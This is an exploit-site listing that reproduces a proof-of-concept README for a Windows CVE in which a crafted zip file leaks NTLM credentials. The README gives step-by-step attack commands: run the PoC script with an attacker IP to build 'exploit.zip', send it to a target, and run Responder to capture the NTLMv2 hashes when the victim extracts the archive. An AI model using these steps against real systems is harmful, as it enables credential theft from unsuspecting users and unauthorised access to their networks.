Exploit for CVE-2025-24071 CVE-2025-24054 CVE-2025-24071

Name: Exploit for CVE-2025-24071 CVE-2025-24054 CVE-2025-24071
Rating: 5 (96 reviews)

2025-03-27 | CVSS 6.5

## https://sploitus.com/exploit?id=A6080F46-449F-5E6A-A8FF-509CBB115CFC
# CVE-2025-24071 / CVE-2025-24054 PoC
# Edit: MICROSOFT HAS BEEN RENAMED CVE-2025-24071 AS CVE-2025-24054 🤔
## Usage
- Execute the script
```bash
python PoC.py test 192.168.1.45
```
![image](https://github.com/user-attachments/assets/591de1a3-8c0f-42af-907d-c7c246efb2b3)

- Send "exploit.zip" to the target, and then you can use [Responder](https://github.com/SpiderLabs/Responder) in order to recive the NTLMv2 hash
```bash
sudo python3 responder.py -I ens33
```
![image](https://github.com/user-attachments/assets/61649a3c-5bbd-4b29-a665-63ca6cf8e73f)

- Now when the target extract the file `.zip`, Boom! we get the NTLM hashes

![til](usecase.gif)